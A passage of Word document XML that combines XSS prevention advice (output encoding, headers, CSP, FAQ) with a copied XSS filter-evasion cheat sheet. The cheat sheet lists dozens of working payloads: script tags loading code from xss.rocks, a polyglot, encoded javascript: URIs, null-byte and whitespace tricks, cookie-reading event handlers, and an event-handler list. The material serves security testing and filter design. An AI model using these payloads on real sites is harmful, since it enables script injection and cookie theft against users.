      </w:r>
    </w:p>
    <w:p w:rsidR="00D37439" w:rsidRPr="00D37439" w:rsidRDefault="00D37439" w:rsidP="00D37439">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>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lastRenderedPageBreak/>
        <w:t>Encode data on output.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D37439">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> At the point where user-controllable data is output in HTTP responses, encode the output to prevent it from being interpreted as active content. Depending on the output context, this might require applying combinations of HTML, URL, JavaScript, and CSS encoding.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D37439" w:rsidRPr="00D37439" w:rsidRDefault="00D37439" w:rsidP="00D37439">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>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Use appropriate response headers.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D37439">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> To prevent XSS in HTTP responses that aren't intended to contain any HTML or JavaScript, you can use the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D37439">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Arial"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Content-Type</w:t>
      </w:r>
      <w:r w:rsidRPr="00D37439">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00D37439">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Arial"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>X-Content-Type-Options</w:t>
      </w:r>
      <w:r w:rsidRPr="00D37439">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> headers to ensure that browsers interpret the responses in the way you intend.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D37439" w:rsidRPr="00D37439" w:rsidRDefault="00D37439" w:rsidP="00D37439">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:num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Content Security Policy.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D37439">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> As a last line of defense, you can use Content Security Policy (CSP) to reduce the severity of any XSS vulnerabilities that still occur.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D37439" w:rsidRPr="00D37439" w:rsidRDefault="00D37439" w:rsidP="00D37439">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="EBF0F2"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="center"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D37439">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Read more</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D37439" w:rsidRPr="00D37439" w:rsidRDefault="00D37439" w:rsidP="00D37439">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="EBF0F2"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId21" w:history="1">
        <w:r w:rsidRPr="00D37439">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="333332"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>How to prevent XSS</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId22" w:history="1">
        <w:r w:rsidRPr="00D37439">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="333332"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Find XSS vulnerabilities using Burp Suite's web vulnerability scanner</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00D37439" w:rsidRPr="00D37439" w:rsidRDefault="00D37439" w:rsidP="00D37439">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D37439">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Common questions about cross-site scripting</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How common are XSS vulnerabilities?</w:t>
      </w:r>
      <w:r w:rsidRPr="00D37439">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> XSS vulnerabilities are very common, and XSS is probably the most frequently occurring web security vulnerability.</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How common are XSS attacks?</w:t>
      </w:r>
      <w:r w:rsidRPr="00D37439">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> It is difficult to get reliable data about real-world XSS attacks, but it is probably less frequently exploited than other vulnerabilities.</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What is the difference between XSS and CSRF?</w:t>
      </w:r>
      <w:r w:rsidRPr="00D37439">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> XSS involves causing a web site to return malicious JavaScript, while CSRF involves inducing a victim user to perform actions they do not intend to do.</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What is the difference between XSS and SQL injection?</w:t>
      </w:r>
      <w:r w:rsidRPr="00D37439">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> XSS is a client-side vulnerability that targets other application users, while SQL injection is a server-side vulnerability that targets the application's database.</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How do I prevent XSS in PHP?</w:t>
      </w:r>
      <w:r w:rsidRPr="00D37439">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> Filter your inputs with a whitelist of allowed characters and use type hints or type casting. Escape your outputs with </w:t>
      </w:r>
      <w:r w:rsidRPr="00D37439">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Arial"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>htmlentities</w:t>
      </w:r>
      <w:r w:rsidRPr="00D37439">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00D37439">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Arial"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ENT_QUOTES</w:t>
      </w:r>
      <w:r w:rsidRPr="00D37439">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> for HTML contexts, or JavaScript Unicode escapes for JavaScript contexts.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D37439" w:rsidRPr="00D37439" w:rsidRDefault="00D37439" w:rsidP="00D37439">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D37439">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>How do I prevent XSS in Java?</w:t>
      </w:r>
      <w:r w:rsidRPr="00D37439">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> Filter your inputs with a whitelist of allowed characters and use a library such as Google Guava to HTML-encode your output for HTML contexts, or use JavaScript Unicode escapes for JavaScript contexts.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D37439" w:rsidRDefault="00D37439"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bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="00D37439" w:rsidRDefault="00D37439"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rsidR="00D37439" w:rsidRDefault="00D37439"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Basic XSS Test Without Filter Evasion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a normal XSS JavaScript injection, and most likely to get caught but I suggest trying it first (the quotes are not required in any modern browser so they are omitted here):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SRC=http://xss.rocks/xss.js&gt;&lt;/SCRIPT&gt;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XSS Locator (Polygot)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following is a "polygot test XSS payload." This test will execute in multiple contexts including html, script string, js and url. Thank you to </w:t>
      </w:r>
      <w:hyperlink r:id="rId23" w:history="1">
        <w:r w:rsidRPr="00DC1572">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="663366"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Gareth Heyes</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> for this </w:t>
      </w:r>
      <w:hyperlink r:id="rId24" w:history="1">
        <w:r w:rsidRPr="00DC1572">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="663366"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>contribution</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>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javascript:/*--&gt;&lt;/title&gt;&lt;/style&gt;&lt;/textarea&gt;&lt;/script&gt;&lt;/xmp&gt;&lt;svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'&gt;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Image XSS using the JavaScript directive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Image XSS using the JavaScript directive (IE7.0 doesn't support the JavaScript directive in context of an image, but it does in other contexts, but the following show the principles that would work in other tags as well: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No quotes and no semicolon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Case insensitive XSS attack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HTML entities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semicolons are required for this to work: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&lt;IMG SRC=javascript:alert(&amp;quot;XSS&amp;quot;)&gt;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Grave accent obfuscation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you need to use both double and single quotes you can use a grave accent to encapsulate the JavaScript string - this is also useful because lots of cross site scripting filters don't know about grave accents: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SRC=`javascript:alert("RSnake says, 'XSS'")`&gt;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Malformed A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Skip the HREF attribute and get to the meat of the XXS... Submitted by David Cross ~ Verified on Chrome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&lt;a onmouseover="alert(document.cookie)"&gt;xxs link&lt;/a&gt;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or Chrome loves to replace missing quotes for you... if you ever get stuck just leave them off and Chrome will put them in the right place and fix your missing quotes on a URL or script.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&lt;a onmouseover=alert(document.cookie)&gt;xxs link&lt;/a&gt;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Malformed IMG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Originally found by Begeek (but cleaned up and shortened to work in all browsers), this XSS vector uses the relaxed rendering engine to create our XSS vector within an IMG tag that should be encapsulated within quotes. I assume this was originally meant to correct sloppy coding. This would make it significantly more difficult to correctly parse apart an HTML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"""&gt;&lt;SCRIPT&gt;alert("XSS")&lt;/SCRIPT&gt;"&gt;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fromCharCode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no quotes of any kind are allowed you can eval() a fromCharCode in JavaScript to create any XSS vector you need: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SRC=javascript:alert(String.fromCharCode(88,83,83))&gt;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Default SRC tag to get past filters that check SRC domain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will bypass most SRC domain filters. Inserting javascript in an event method will also apply to any HTML tag type injection that uses elements like Form, Iframe, Input, Embed etc. It will also allow any relevant event for the tag type to be substituted like onblur, onclick giving you an extensive amount of variations for many injections listed here. Submitted by David Cross .</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Edited by Abdullah Hussam(@Abdulahhusam).</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&lt;IMG SRC=# onmouseover="alert('xxs')"&gt;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Default SRC tag by leaving it empty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onmouseover="alert('xxs')"&gt;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Default SRC tag by leaving it out entirely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onmouseover="alert('xxs')"&gt;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On error alert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onerror="alert(String.fromCharCode(88,83,83))"&gt;&lt;/img&gt;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IMG onerror and javascript alert encode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src=x onerror="&amp;#0000106&amp;#0000097&amp;#0000118&amp;#0000097&amp;#0000115&amp;#0000099&amp;#0000114&amp;#0000105&amp;#0000112&amp;#0000116&amp;#0000058&amp;#0000097&amp;#0000108&amp;#0000101&amp;#0000114&amp;#0000116&amp;#0000040&amp;#0000039&amp;#0000088&amp;#0000083&amp;#0000083&amp;#0000039&amp;#0000041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Decimal HTML character references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all of the XSS examples that use a javascript: directive inside of an &lt;IMG tag will not work in Firefox or Netscape 8.1+ in the Gecko rendering engine mode).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SRC=&amp;#106;&amp;#97;&amp;#118;&amp;#97;&amp;#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;#116;&amp;#58;&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#40;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&amp;#39;&amp;#88;&amp;#83;&amp;#83;&amp;#39;&amp;#41;&gt;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Decimal HTML character references without trailing semicolons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is often effective in XSS that attempts to look for "&amp;#XX;", since most people don't know about padding - up to 7 numeric characters total. This is also useful against people who decode against </w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>strings like $tmp_string =~ s/.*\&amp;#(\d+);.*/$1/; which incorrectly assumes a semicolon is required to terminate a html encoded string (I've seen this in the wild):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SRC=&amp;#0000106&amp;#0000097&amp;#0000118&amp;#0000097&amp;#0000115&amp;#0000099&amp;#0000114&amp;#0000105&amp;#0000112&amp;#0000116&amp;#0000058&amp;#0000097&amp;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#0000108&amp;#0000101&amp;#0000114&amp;#0000116&amp;#0000040&amp;#0000039&amp;#0000088&amp;#0000083&amp;#0000083&amp;#0000039&amp;#0000041&gt;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Hexadecimal HTML character references without trailing semicolons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also a viable XSS attack against the above string $tmp_string =~ s/.*\&amp;#(\d+);.*/$1/; which assumes that there is a numeric character following the pound symbol - which is not true with hex HTML characters).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SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt;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Embedded tab</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Used to break up the cross site scripting attack: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w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>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Embedded Encoded tab</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Use this one to break up XSS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SRC="jav&amp;#x09;ascript:alert('XSS');"&gt;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Embedded newline to break up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Some websites claim that any of the chars 09-13 (decimal) will work for this attack. That is incorrect. Only 09 (horizontal tab), 10 (newline) and 13 (carriage return) work. See the ascii chart for more details. The following four XSS examples illustrate this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SRC="jav&amp;#x0A;ascript:alert('XSS');"&gt;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Embedded carriage return to break up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(Note: with the above I am making these strings longer than they have to be because the zeros could be omitted. Often I've seen filters that assume the hex and dec encoding has to be two or three characters. The real rule is 1-7 characters.):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SRC="jav&amp;#x0D;ascript:alert('XSS');"&gt;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Null breaks up JavaScript directive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Null chars also work as XSS vectors but not like above, you need to inject them directly using something like Burp Proxy or use %00 in the URL string or if you want to write your own injection tool you can either use vim (^V^@ will produce a null) or the following program to generate it into a text file. Okay, I lied again, older versions of Opera (circa 7.11 on Windows) were vulnerable to one additional char 173 (the soft hypen control char). But the null char %00is much more useful and helped me bypass certain real world filters with a variation on this example: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perl -e 'print "&lt;IMG SRC=java\0script:alert(\"XSS\")&gt;";' &gt; out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Spaces and meta chars before the JavaScript in images for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useful if the pattern match doesn't take into account spaces in the word "javascript:" -which is correct since that won't render- and makes the false assumption that you can't have a space between the quote and the "javascript:" keyword. The actual reality is you can have any char from 1-32 in decimal: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&amp;#14;  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Non-alpha-non-digit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Firefox HTML parser assumes a non-alpha-non-digit is not valid after an HTML keyword and therefor considers it to be a whitespace or non-valid token after an HTML tag. The problem is that some XSS filters assume that the tag they are looking for is broken up by whitespace. For example "&lt;SCRIPT\s" != "&lt;SCRIPT/XSS\s":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&lt;SCRIPT/XSS SRC="http://xss.rocks/xss.js"&gt;&lt;/SCRIPT&gt;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Based on the same idea as above, however,expanded on it, using Rnake fuzzer. The Gecko rendering engine allows for any character other than letters, numbers or encapsulation chars (like quotes, angle brackets, etc...) between the event handler and the equals sign, making it easier to bypass cross site scripting blocks. Note that this also applies to the grave accent char as seen here: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&lt;BODY onload!#$%&amp;()*~+-_.,:;?@[/|\]^`=alert("XSS")&gt;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Yair Amit brought this to my attention that there is slightly different behavior between the IE and Gecko rendering engines that allows just a slash between the tag and the parameter with no spaces. This could be useful if the system does not allow spaces.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&lt;SCRIPT/SRC="http://xss.rocks/xss.js"&gt;&lt;/SCRIPT&gt;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Extraneous open brackets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Submitted by Franz Sedlmaier, this XSS vector could defeat certain detection engines that work by first using matching pairs of open and close angle brackets and then by doing a comparison of the tag inside, instead of a more efficient algorythm like Boyer-Moore that looks for entire string matches of the open angle bracket and associated tag (post de-obfuscation, of course). The double slash comments out the ending extraneous bracket to supress a JavaScript error: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&lt;&lt;SCRIPT&gt;alert("XSS");//&lt;&lt;/SCRIPT&gt;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No closing script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In Firefox and Netscape 8.1 in the Gecko rendering engine mode you don't actually need the "&gt;&lt;/SCRIPT&gt;" portion of this Cross Site Scripting vector. Firefox assumes it's safe to close the HTML tag and add closing tags for you. How thoughtful! Unlike the next one, which doesn't effect Firefox, this does not require any additional HTML below it. You can add quotes if you need to, but they're not needed generally, although beware, I have no idea what the HTML will end up looking like once this is injected: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SRC=http://xss.rocks/xss.js?&lt; B &gt;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Protocol resolution in script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particular variant was submitted by Łukasz Pilorz and was based partially off of Ozh's protocol resolution bypass below. This cross site scripting example works in IE, Netscape in IE rendering mode and Opera if you add in a &lt;/SCRIPT&gt; tag at the end. However, this is especially useful where space is an issue, and of course, the shorter your domain, the better. The ".j" is valid, regardless of the encoding type because the browser knows it in context of a SCRIPT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SRC=//xss.rocks/.j&gt;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Half open HTML/JavaScript XSS vector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Unlike Firefox the IE rendering engine doesn't add extra data to your page, but it does allow the javascript: directive in images. This is useful as a vector because it doesn't require a close angle </w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>bracket. This assumes there is any HTML tag below where you are injecting this cross site scripting vector. Even though there is no close "&gt;" tag the tags below it will close it. A note: this does mess up the HTML, depending on what HTML is beneath it. It gets around the following NIDS regex: /((\%3D)|(=))[^\n]*((\%3C)|&lt;)[^\n]+((\%3E)|&gt;)/ because it doesn't require the end "&gt;". As a side note, this was also affective against a real world XSS filter I came across using an open ended &lt;IFRAME tag instead of an &lt;IMG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Double open angle brackets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Using an open angle bracket at the end of the vector instead of a close angle bracket causes different behavior in Netscape Gecko rendering. Without it, Firefox will work but Netscape won't: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src=http://xss.rocks/scriptlet.html &lt;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Escaping JavaScript escapes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When the application is written to output some user information inside of a JavaScript like the following: &lt;SCRIPT&gt;var a="$ENV{QUERY_STRING}";&lt;/SCRIPT&gt; and you want to inject your own JavaScript into it but the server side application escapes certain quotes you can circumvent that by escaping their escape character. When this gets injected it will read &lt;SCRIPT&gt;var a="\\";alert('XSS');//";&lt;/SCRIPT&gt; which ends up un-escaping the double quote and causing the Cross Site Scripting vector to fire. The XSS locator uses this method.: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An alternative, if correct JSON or Javascript escaping has been applied to the embedded data but not HTML encoding, is to finish the script block and start your own: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&lt;/script&gt;&lt;script&gt;alert('XSS');&lt;/script&gt;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End title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a simple XSS vector that closes &lt;TITLE&gt; tags, which can encapsulate the malicious cross site scripting attack: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&lt;/TITLE&gt;&lt;SCRIPT&gt;alert("XSS");&lt;/SCRIPT&gt;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INPUT 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&lt;INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"&gt;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BODY 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BACKGROUND="javascript:alert('XSS')"&gt;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IMG Dynsrc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DYNSRC="javascript:alert('XSS')"&gt;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IMG lowsrc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LOWSRC="javascript:alert('XSS')"&gt;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List-style-image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Fairly esoteric issue dealing with embedding images for bulleted lists. This will only work in the IE rendering engine because of the JavaScript directive. Not a particularly useful cross site scripting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&lt;STYLE&gt;li {list-style-image: url("javascript:alert('XSS')");}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS&lt;/br&gt;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VBscript in an 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SRC='vbscript:msgbox("XSS")'&gt;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Livescript (older versions of Netscape only)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SRC="livescript:[code]"&gt;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SVG object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&lt;svg/onload=alert('XSS')&gt;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ECMAScript 6</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Set.constructor`alert\x28document.domain\x29```</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BODY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Method doesn't require using any variants of "javascript:" or "&lt;SCRIPT..." to accomplish the XSS attack). Dan Crowley additionally noted that you can put a space before the equals sign ("onload=" != "onload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Event Handlers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It can be used in similar XSS attacks to the one above (this is the most comprehensive list on the net, at the time of this writing). Thanks to Rene Ledosquet for the HTML+TIME updates.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w:t>
      </w:r>
      <w:hyperlink r:id="rId25" w:history="1">
        <w:r w:rsidRPr="00DC1572">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="663366"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Dottoro Web Reference</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> also has a nice </w:t>
      </w:r>
      <w:hyperlink r:id="rId26" w:history="1">
        <w:r w:rsidRPr="00DC1572">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="663366"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>list of events in JavaScript</w:t>
        </w:r>
      </w:hyperlink>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FSCommand()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (attacker can use this when executed from within an embedded Flash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onAbort()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (when user aborts the loading of an image)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onActivate()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (when object is set as the active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onAfterPrint()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (activates after user prints or previews print job)</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onAfterUpdate()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (activates on data object after updating data in the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onBeforeActivate()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (fires before the object is set as the active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onBeforeCopy()</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (attacker executes the attack string right before a selection is copied to the clipboard - attackers can do this with the </w:t>
      </w:r>
      <w:r w:rsidRPr="00DC1572">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
